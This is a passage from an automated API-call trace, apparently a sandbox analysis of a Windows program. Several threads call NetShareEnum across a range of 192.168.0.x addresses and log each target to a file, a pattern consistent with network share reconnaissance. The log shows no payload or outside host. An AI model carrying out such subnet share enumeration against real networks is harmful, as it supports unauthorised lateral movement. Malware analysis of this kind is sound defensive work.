lpWideCharStr="\\\\192.168.0.194", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.194", lpUsedDefaultChar=0x0) returned 15 [0201.576] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x235ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0201.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0201.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0201.576] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x235ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0201.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0201.576] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0201.576] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x235fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x235fc54*=0x11, lpOverlapped=0x0) returned 1 [0201.581] NetShareEnum (in: servername="\\\\192.168.0.194", level=0x1, bufptr=0x235fedc, prefmaxlen=0xffffffff, entriesread=0x235fed4, totalentries=0x235fed0, resume_handle=0x235fecc | out: bufptr=0x235fedc, entriesread=0x235fed4, totalentries=0x235fed0, resume_handle=0x235fecc) returned 0x35 [0257.978] SetEvent (hEvent=0x1dc) returned 1 [0257.978] RtlExitUserThread (Status=0x0) Thread: id = 22 os_tid = 0x920 [0088.037] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.1", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.037] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.1", cchWideChar=13, lpMultiByteStr=0x1e82f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.1", lpUsedDefaultChar=0x0) returned 13 [0088.038] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x249ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.038] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.038] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.038] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x249ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.038] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.038] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.038] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x249fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x249fc54*=0xf, lpOverlapped=0x0) returned 1 [0088.038] NetShareEnum (in: servername="\\\\192.168.0.1", level=0x1, bufptr=0x249fedc, prefmaxlen=0xffffffff, entriesread=0x249fed4, totalentries=0x249fed0, resume_handle=0x249fecc | out: bufptr=0x249fedc, entriesread=0x249fed4, totalentries=0x249fed0, resume_handle=0x249fecc) returned 0x35 [0126.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.66", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0126.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.66", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.66", lpUsedDefaultChar=0x0) returned 14 [0126.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x249ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0126.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0126.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0126.307] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x249ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0126.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0126.307] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0126.307] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x249fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x249fc54*=0x10, lpOverlapped=0x0) returned 1 [0126.318] NetShareEnum (in: servername="\\\\192.168.0.66", level=0x1, bufptr=0x249fedc, prefmaxlen=0xffffffff, entriesread=0x249fed4, totalentries=0x249fed0, resume_handle=0x249fecc | out: bufptr=0x249fedc, entriesread=0x249fed4, totalentries=0x249fed0, resume_handle=0x249fecc) returned 0x35 [0172.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.134", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0172.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.134", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.134", lpUsedDefaultChar=0x0) returned 15 [0172.290] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x249ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0172.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0172.290] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x249ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0172.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.290] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0172.290] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x249fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x249fc54*=0x11, lpOverlapped=0x0) returned 1 [0172.294] NetShareEnum (in: servername="\\\\192.168.0.134", level=0x1, bufptr=0x249fedc, prefmaxlen=0xffffffff, entriesread=0x249fed4, totalentries=0x249fed0, resume_handle=0x249fecc | out: bufptr=0x249fedc, entriesread=0x249fed4, totalentries=0x249fed0, resume_handle=0x249fecc) returned 0x35 [0205.911] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.202", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.911] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.202", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.202", lpUsedDefaultChar=0x0) returned 15 [0205.911] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x249ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0205.911] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.911] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0205.911] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x249ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0205.911] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.911] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0205.911] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x249fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x249fc54*=0x33, lpOverlapped=0x0) returned 1 [0205.984] NetShareEnum (in: servername="\\\\192.168.0.202", level=0x1, bufptr=0x249fedc, prefmaxlen=0xffffffff, entriesread=0x249fed4, totalentries=0x249fed0, resume_handle=0x249fecc | out: bufptr=0x249fedc, entriesread=0x249fed4, totalentries=0x249fed0, resume_handle=0x249fecc) returned 0x35 [0257.944] SetEvent (hEvent=0x1dc) returned 1 [0257.944] RtlExitUserThread (Status=0x0) Thread: id = 23 os_tid = 0x8e4 [0088.040] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.2", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.040] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.2", cchWideChar=13, lpMultiByteStr=0x1e82f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.2", lpUsedDefaultChar=0x0) returned 13 [0088.040] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x25dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.040] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.040] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.040] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x25dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.040] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.040] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.040] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x25dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x25dfc54*=0xf, lpOverlapped=0x0) returned 1 [0088.041] NetShareEnum (in: servername="\\\\192.168.0.2", level=0x1, bufptr=0x25dfedc, prefmaxlen=0xffffffff, entriesread=0x25dfed4, totalentries=0x25dfed0, resume_handle=0x25dfecc | out: bufptr=0x25dfedc, entriesread=0x25dfed4, totalentries=0x25dfed0, resume_handle=0x25dfecc) returned 0x35 [0132.925] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.68", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0132.925] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.68", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.68", lpUsedDefaultChar=0x0) returned 14 [0132.925] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x25dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0132.925] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.925] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0132.925] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x25dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0132.925] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0132.925] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0132.925] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x25dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x25dfc54*=0x10, lpOverlapped=0x0) returned 1 [0132.931] NetShareEnum (in: servername="\\\\192.168.0.68", level=0x1, bufptr=0x25dfedc, prefmaxlen=0xffffffff, entriesread=0x25dfed4, totalentries=0x25dfed0, resume_handle=0x25dfecc | out: bufptr=0x25dfedc, entriesread=0x25dfed4, totalentries=0x25dfed0, resume_handle=0x25dfecc) returned 0x35 [0172.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.136", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0172.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.136", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.136", lpUsedDefaultChar=0x0) returned 15 [0172.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x25dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0172.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0172.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x25dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0172.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0172.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0172.302] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x25dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x25dfc54*=0x22, lpOverlapped=0x0) returned 1 [0172.319] NetShareEnum (in: servername="\\\\192.168.0.136", level=0x1, bufptr=0x25dfedc, prefmaxlen=0xffffffff, entriesread=0x25dfed4, totalentries=0x25dfed0, resume_handle=0x25dfecc | out: bufptr=0x25dfedc, entriesread=0x25dfed4, totalentries=0x25dfed0, resume_handle=0x25dfecc) returned 0x35 [0205.897] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.199", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0205.897] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.199", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.199", lpUsedDefaultChar=0x0) returned 15 [0205.897] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x25dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0205.897] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.897] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0205.897] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x25dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0205.897] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0205.897] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0205.897] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x25dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x25dfc54*=0x11, lpOverlapped=0x0) returned 1 [0205.901] NetShareEnum (in: servername="\\\\192.168.0.199", level=0x1, bufptr=0x25dfedc, prefmaxlen=0xffffffff, entriesread=0x25dfed4, totalentries=0x25dfed0, resume_handle=0x25dfecc | out: bufptr=0x25dfedc, entriesread=0x25dfed4, totalentries=0x25dfed0, resume_handle=0x25dfecc) returned 0x35 [0257.960] SetEvent (hEvent=0x1dc) returned 1 [0257.960] RtlExitUserThread (Status=0x0) Thread: id = 24 os_tid = 0xbe0 [0088.042] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.3", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0088.042] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.3", cchWideChar=13, lpMultiByteStr=0x1e82f0c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.3", lpUsedDefaultChar=0x0) returned 13 [0088.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x271ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.042] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.042] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.042] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x271ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.042] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.042] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.042] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x271fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x271fc54*=0xf, lpOverlapped=0x0) returned 1 [0088.042] NetShareEnum (in: servername="\\\\192.168.0.3", level=0x1, bufptr=0x271fedc, prefmaxlen=0xffffffff, entriesread=0x271fed4, totalentries=0x271fed0, resume_handle=0x271fecc | out: bufptr=0x271fedc, entriesread=0x271fed4, totalentries=0x271fed0, resume_handle=0x271fecc) returned 0x35 [0132.942] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.69", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, 